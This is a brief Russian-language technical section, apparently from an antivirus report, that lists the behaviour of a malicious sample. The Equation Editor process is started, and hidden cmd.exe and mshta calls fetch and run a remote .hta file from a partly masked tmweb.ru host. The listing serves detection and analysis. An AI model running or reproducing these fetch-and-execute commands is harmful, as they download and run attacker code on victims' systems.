Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/Ofc.hta
- http://cn####8.tmweb.ru/Ofc.hta
- DNS ASK cn####8.tmweb.ru
- '%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/Ofc.hta' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\mshta.exe' http://cn####8.tmweb.ru/Ofc.hta